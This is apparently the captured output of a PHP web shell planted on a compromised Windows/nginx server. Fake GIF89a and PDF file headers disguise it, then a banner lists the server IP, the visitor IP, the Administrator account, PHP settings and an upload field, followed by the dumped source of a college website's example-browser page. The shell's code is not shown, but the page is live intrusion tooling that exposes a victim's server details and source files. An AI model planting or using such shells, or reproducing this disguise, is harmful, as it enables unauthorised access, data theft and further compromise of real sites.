GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/common/Browser/ |
Upload File : |
<? // common/Browser/index.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. require('application.phpinc'); $evaluationTitle = "Example browser"; $title = 'Example browser'; $headTitle = '_CST_ - '.$title; $pageTitle = $title; $smallTitle = true; require('common/pageHeader.phpinc'); /**/ require('Browser.phpinc'); BrowserBegin('Page title','https://cst.ridgewater.edu/common/Browser/'); ?> <br> <code>include<span style="color:#009;">(</span><span style="color:#CC0033;">'common/Browser/Browser.phpinc'</span><span style="color:#009;">)</span><span style="color:#000;">;</span></code><br> <code><span style="color:#000;">BrowserBegin</span><span style="color:#009;">(</span><span style="color:#09F">$title</span><span style="color:#000;">,</span> <span style="color:#09F">$location</span><span style="color:#000;">,</span> <span style="color:#09F">$width</span><span style="color:#000;">,</span> <span style="color:#09F">$height</span><span style="color:#009;">)</span><span style="color:#000;">;</span></code><br> <br>Then place the browser "content" in your document. <br><br> <code><span style="color:#000;">BrowserEnd</span><span style="color:#009;">()</span><span style="color:#000;">;</span></code><br> <br> <? BrowserEnd(); ?> <br>If <span style="color:#09F">$title</span> is not given or empty, no title will be displayed. <br>If <span style="color:#09F">$location</span> is not given, the location will display as <b>http://localhost/</b>. <br>If <span style="color:#09F">$width</span><span style="color:#000;"> or </span> <span style="color:#09F">$height</span> are not given, the browser window will expand to show the content. <? /**/ require('common/pageFooter.phpinc'); if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>